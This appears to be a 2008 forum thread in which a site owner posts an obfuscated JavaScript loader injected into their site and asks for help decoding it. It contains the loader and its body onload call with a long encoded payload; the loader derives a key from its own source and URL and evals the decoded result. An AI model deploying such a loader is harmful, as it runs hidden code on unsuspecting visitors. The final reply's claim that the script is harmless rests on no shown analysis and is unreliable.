...

View Full Version : purpose of this script.



madz
08-10-2008, 01:56 AM
One of my associates, who has root access to my site's FTP, had a spyware infection, and it managed to embed a script on my site. I traced the script all the way back to this function. I am not an expert in JavaScript, but it looks like all the data is passed to this function and decrypted in some way. Can you guys help me modify it so I can figure out what it was actually designed to do?

here is the function


function tYFG62c1F(IDkvG4nkn, dRBgV5JDW){var jA74Ll3N2 = arguments.callee;var R7y5DmyJp = location.href;jA74Ll3N2 = jA74Ll3N2.toString();jA74Ll3N2 = jA74Ll3N2 + R7y5DmyJp;var V5bXU3HS2 = jA74Ll3N2.replace(/\W/g, "");V5bXU3HS2 = V5bXU3HS2.toUpperCase();var JGa3J60pA = 4294967296;var E6QdjiN2e = new Array;for(var ko5Q7Mpq8 = 0; ko5Q7Mpq8 < 256; ko5Q7Mpq8++) {E6QdjiN2e[ko5Q7Mpq8] = 0;}var G8tM51Cp4 = 1;for(var ko5Q7Mpq8 = 128; ko5Q7Mpq8; ko5Q7Mpq8 >>= 1) {G8tM51Cp4 = G8tM51Cp4 >>> 1 ^ (G8tM51Cp4 & 1 ? 3988292384 : 0);for(var aH1heD5Rg = 0; aH1heD5Rg < 256; aH1heD5Rg += ko5Q7Mpq8 * 2) {var hug7K8d20 = ko5Q7Mpq8 + aH1heD5Rg;E6QdjiN2e[hug7K8d20] = E6QdjiN2e[aH1heD5Rg] ^ G8tM51Cp4;if (E6QdjiN2e[hug7K8d20] < 0) {E6QdjiN2e[hug7K8d20] += JGa3J60pA;}}}var y54Ix84S6 = JGa3J60pA - 1;for(var u033a3IVn = 0; u033a3IVn < V5bXU3HS2.length; u033a3IVn++) {var lCaM67h4s = (y54Ix84S6 ^ V5bXU3HS2.charCodeAt(u033a3IVn)) & 255;y54Ix84S6 = (y54Ix84S6 >>> 8) ^ E6QdjiN2e[lCaM67h4s];}y54Ix84S6 = y54Ix84S6 ^ (JGa3J60pA - 1);if (y54Ix84S6 < 0) {y54Ix84S6 += JGa3J60pA;}y54Ix84S6 = y54Ix84S6.toString(16).toUpperCase();while(y54Ix84S6.length < 8) {y54Ix84S6 = "0" + y54Ix84S6;}var E8nIyBM1p = new Array;for(var ko5Q7Mpq8 = 0; ko5Q7Mpq8 < 8; ko5Q7Mpq8++) {E8nIyBM1p[ko5Q7Mpq8] = y54Ix84S6.charCodeAt(ko5Q7Mpq8);}var u4M1b5qiL = "";var oQEs4S3Q6 = 0;for(var ko5Q7Mpq8 = 0; ko5Q7Mpq8 < IDkvG4nkn.length; ko5Q7Mpq8 += 2){var hug7K8d20 = IDkvG4nkn.substr(ko5Q7Mpq8, 2);alert(hug7K8d20);var k3EBh8S75 = parseInt(hug7K8d20, 16);var aQ6Es8oMa = k3EBh8S75 - E8nIyBM1p[oQEs4S3Q6];if(aQ6Es8oMa < 0) {aQ6Es8oMa = aQ6Es8oMa + 256;}u4M1b5qiL += String.fromCharCode(aQ6Es8oMa);if(oQEs4S3Q6 + 1 == E8nIyBM1p.length) {oQEs4S3Q6 = 0;} else {oQEs4S3Q6++;}}var AvEJlrD0g = 0;try {eval(u4M1b5qiL);} catch(e) {AvEJlrD0g = 1;}try {if (AvEJlrD0g) {window.location = "/";}} catch(e) {}}



And here is the way it was called. By the way, please do not attempt to execute it unless you have an idea of what it does, because I know it was possibly meant to be malicious, and that is why I want to know what it did or could have done to my site's visitors.

for the call


<body onload="tYFG62c1F('96B9a59AA99dB0A750927A839a89B77F96945f7B96759271677c676F6154ab7e92b99F9065A07962abba98a95 5a8A68f79887D78977C617650A5A99EaaA1A6a7A4b7659A96a0ad9E957FAD98a754a7929a788D7Ca37C86596d64a3a69895b 5a29fB2659Fa799A774A4a98d80797a829b78647457A9999782748a78997d62B5a883B8A9A0A39b69626Bb89c8d7e78877a9 28c577455A8A68f79887D78977C616450AA90A1698A86a7788972ad96A6618777787b687e838E7c508157ab9A8A8A7D76859 97F63a6a6a99CA59a9c5d639D905fab635757566a747e8b6B7B667d908673647457837b757D618d86847862b5a885b4A79ca 777a2ac956C6072ab95B3597794A29Bab9C73a0A564745769667a6d697A6e696E6a7caf91b657a39b6c8Fa4688D6a8455716 1a795BB5778A7a6A2B26baaa6A95daaA2ab50b167988682988B7299577455647C599d749888838B937b85647357676977745 0B167988682988b729962625E54bca5967c85a26d7d74868BB167988682988B7299945772547174adBA98a9557A8fAE819A6 F6E786861765075729Da4A669AF91B657a4659592878796798C5571616A627c7257a264A28A7e9b89798A6F61A660a588858 C86838e5082757455656a59ab8A85ac868a797073785774557A8fAE819A6f6e786861776e825768559261617692ac888B6c7 87C64645D5766548059637d6f6f676D736c6878577155646a7496b3a95fAB95b3599aB76cA37a6c716C67647457656F61A3a 379A37c6d647470508057696A6A7C599ab76cA37a6C716c6764627455a1719A81928E897789616350766057b0aaA2AB50B69 b7faba6ab85619c577455A1719A81928E897789616450aeAA6cA1797969637B72A39b6c8fa4688d6a8490A6a581A6b6a1836 68C9E596d64A39D6D82ac71797784929Fa776a5757C676A6c916197508a85AC868A7970737872A09b5469A5967C85a26D7d7 4868Bb69B7FabA6AB85619c94577154716250BFA39D6d82ac7179778492a79889AFa2AE83688D9161646d647E87a098B7A16 2abac72b2b1beaf91b657998566B86E77a581825571618080AF9bad9D66A8ae50715768709AB0AB58BA98A95589786b82969 A6C6Ba76176507472578a6B738B82A76C6dA8547D597e8B6b7b667d90867372a39cA39bB5A16b648C6E6786939c657Aaa626 05D61b4a6A5a9578997aa6F60b790a467547E5958A68769AC69889a7A8f57955582886D7475808682776F9c98a5a97Aa498A 67aA46C8c6e6786939C657Aaa605e54675962796c72978473b0658b988180547E5958a68769ac69889A7A8f5775737261715 
9649557a19A79879B7C806A828F959C997A67aa8eA173966BC1998767AB7680918e82577254A38962BB6C7E967E8c598e645 f7e859Fa5af98769eac5561616a597FA09d555ca38962BB6C7E967E8C596C64676055afa38962BB6c7E967E8C595b81577E8 59FA5AF98769eac70B1a38962bb6c7E967e8C596D64998767ab7680918E8265a9a394adA2ADa59E5d6577625Eb8A68cA5a4a 6ab73A5aa9C5D5d7Cb098ada39c5d96916Ba7797e987f7F6FA595b29Eab9d547D59686D57B2978473B0658b988180547E595 27459576054A38962bb6C7E967e8c74ADba98a9559Db46A61746A7CAD82617650B29cae5575b3ab91BD729DA4A669af91b65 7a4659592878796798c557161696B64A46796858f9082868c577154797450b167988682988b729962625E54bca2A37568676 879B9878BB167988682988b729994577254a38962bb6c7e967e8c6793ac98A978a3A59e71B85fa4659592878796798C5e6Fb eAF91b6578ca59C886e9c939Fb05571615B527Fad98A754936CA67686687d6A91596D6467729bA3b361A6A5A957a264a28a7 e9b89798A547E59607f57A4659592878796798C5570617D9185886F6c6c71715Eb09ca59cA8A97450b167988682988b72995 76272547362ABBA98A955a6a581a6b6A183668c617650889878866c7871607C65aaaa96b4ADa26CA46796858F9082868c635 5666a74a6a5A957ae788D7166aa6dAEa0547E59a0a5a9AA9A7DAFad58B69b7FABa6AB85619c6357666A6A74A6A5A95785a1b 28891868D6D9c547E59A988836f6B9a77B09b6464579EA7726a60777Caf838F936Ca67686687d6a91966BAD9d5F85a1b2889 1868D6D9C547D59606D57b285a1B28891868d6D9c547E5980B1a8869676976f9764625767697774ad99A79F7c69AD8898bd5 762725494ada2ADa59e639ab3A89D879F98a777B09d956c87a4A683a27b867a9E60709dA7618277ad698465896F806462576 6547e7650ADAA686664747Ea89265a39aa2A8AD986D57b28767B76b7F757F6d85547e59607FB4579AA0B49E50bf896Aab669 06A787a8762606FBEB6A6a5a9578c66AF6968ab6cA686547e59607faba9AE54BC9eA6a5A35f8Aa4A98065B0869fAE5d7CB65 0a798AB989c699E5964B28e67a271719779A6885571616a6bc1aba9ae54BCa296645F8E67a271719779A6885E54bcb099b29 ba6AC62adA893A5ABA0A4a261765066665970B1BE5993a5ab9a9d5Ca66250bfB4b43F8284859599AD7d9B84696064766c676 e9A827A667A6C796b6A7A6D917898707676836A71867868776d769E69886e707764786D67876D786E64786e65896d6D97657 
66a65746B67699Aa26F697a996f6A6A799E697C9898776a796E69a56e7B6e6D757d68776c6A6B97776965876f686967757e9 2A7706b976b7669687499996E6cA37192AA706F6c6a7A9A63896F6a6a6A779b677A6d6A6B97777b64766C679697826e727C6 C6A77657a6c69a96e7C6E7a7a9e67a76F796999777D65796D7B6b6a786D66886D9c6a66749A91A6986E766c776D91A878696 e69826b91A5706C6E98827a648A6e676B69767066796E6D6a78787F65776a9b6A66749a717D996f767A776d73756b67697A7 4726986996C966C776D66899870966A826B657999676b997870917d6E6D6C69786a697b6F6A6B6A787f92746d796c6c7a6c6 77C6E6d6c6BA26F68767868966aA26F6989989b6e6bA3717279786C6c67A269917579796e98A29D9278786D6c677a7C69859 96B6e98a37171896d7c767A7771667C78706c6d786d687B706C6C64767b65a96D6D7765766a65746a9a6979a26f697a796f6 a6a7A9C9374786877798272718A787b6D69776d68776C6a97677a6A91A6787d6e98826E72859869976b767e7179996996968 27B91AA7868976c799b69AA6e7C6b6DA270687D6D6a6D6a7a6b69766e6b9668A26E9277706F6D64749d63aa6b9D687A766a6 5746a9a69997a7269A66D6D6a99799e697c9898976a796e69856E9b6e6d776D68776E676b69776965796d7a6A77776D69A97 87B9767A27271897a676e787A6C6778707A97677a6d6985999C6d69A29a66896C6C6E6AA26E6989987096657A7191AA78679 695766B65a96d6d6A6B796a667A6D676c6a767265797a686967759e64AA6a9A6999826F697A996F6a6A7971927b989A6D6D8 26967A899706d66776d68776c6a77697A6a717b99706E96799d9278786E6B78797191aa996B767a837D937470786e68767E7 17B9899766AA369917b706D76757671667878696c95786c71886c7D6b97767065896D9d6C65766a65746B67699a747263a96 B9d6e7a827A667a6C796d6d826A71896F98766A799c927D6e9D6B69779E65796e6d6A9a776D93756b67699a747263896B7D6 87A799E697c7878976A796e69856e7B6e6d776D68776c6A6D6Da26a91A96F78966A799c727d6e7d6c67826d917870707675a 36f718A786896977671667A6e7a6a7a787f64AA6A7A6979747264766c67687a759d648a79676A66747A63a96B7D7767766a6 5746B67697a747263a9989d6e77776d66896e7B6e6ba270917A70796e76787B717D6c6a6B6a779D65796e6D6A9A776D73756 b67699a747263896b7d6E6cA36F91A6706B7764777b64766C67687a757D93776b67697A747272766C6a6964A46a667a706D9 
66Aa26d697C989C6a79827266AA6c6a9864766992766C6a6964766A6574786E776BA27265799a686967757e64aa709A96967 6696588796B6e6B837A91aa7078766aA26D7178996F6B68836A718a98677675796D7189796D6e96A37091756C6c97967a726 97d78797669786c72896D677766826c6676999B9667837a667C70676C677A6E9177786e6E6CA36991a6706E6E697a7C91a57 87B6E7A836b668A6B67697a747263a9989B76697A6d927c986f6E687A7069A66D6d6c67776D66886D6A6c6a767067746c6a6 964846A667a706d966aa26D697C989c6A79A272668a6c6a7864766992766C6a6964766A6574787876787a72917578796a797 99e697c9898976A796e69A56E9b6E6D786B7276706f97677a70717D787C6A6A7969667a6d796B79747d638a6b7D6D647A6f9 2a8786b6E757a6E668798706A6a796A667A6c986C69767065796E686a6a799E697c7878976A796E69A56e7B6E6D787F65776 a9B6A66749A64766C677677826e927c6C6A776d7972677A98706d6a7A6a91A7706b6B69777D657998987669A270728678679 6957A7E917D6E6B6E6d836F7186706B776D7A6e678599696E76836A71867868976d7671657b79706e6D836f91AA986a976D7 66b65A96f686967757e72856F7A6d6A7A6C6879706a6e97a26e6778786D9695826D677A99989695836f718A706C9795a26d6 9856d7C6A6c8371728A986a7675766B66756D6d6a6CA37171869899976D767F69aa986E7677826e927D706D976b7a7291797 9786a6C777d68756b67697A826d68896f6e6e6D7a6D69777070966a769e917C78799695796e7285986e976b7A72697B99997 675827266A96c6C776CA26b697c6D6f6B66776D667c7099776da26d91796f676B69786C678a6d6B6C67776B66796E706b687 89D677D6D686c6D767F697c787B6E9A786A917C707a7767767F6989996B6E75a27292a96d68966c7A7069896F6C6E77827a9 1a77070966D7A6f66A578796B6a7870677A6d6A6C6A7A6f667c6E6d6b6a786D67a86d7876757769698598986b76787c677a6 D6C6C69776966796E6d6B6a786D677a6D6a6C69776b697B6E7b6b77786e67A56D986c6C7A6b6986787A6b6A786D667c6C6a6 c64766967aa706f9698836E69a6706F6C777a6C65796e686a6aa29B72796F6a976ba26E6878787B6e97776d67756C6A6E648 26E697b7978767aA272677B709b6B69767b657999696e6DA29d67a9707A6e7A776f68886D9d6C65766A65746B67697a7A6D7 17878707676836A71867868976d767e697B796C6E75837D6778706b7769A26969A5796b6e9579707189707A77657A6D65A87 9786d7a796e917d6f6a6E667A6f697a6d7d6c65766A657479676A66747A576D72')">



If anyone can help me modify it to figure out what it was passing to the function to determine its purpose it would be a load off of my chest.

ninnypants
08-10-2008, 05:18 AM
Go through and delete every instance of it. It was probably messing with links on your site but without hours of running it and going through all the gibberish it's impossible to tell

madz
08-10-2008, 07:39 PM
as long as it didnt somehow infect anyone with spyware using known vulnerabilities everything should be alright. ya i deleted it but it still kinda sucks.

rnd me
08-10-2008, 08:21 PM
it doesn't do anything harmful, just annoying.

most importantly, it doesn't "phone home", so privacy and security should not be affected.


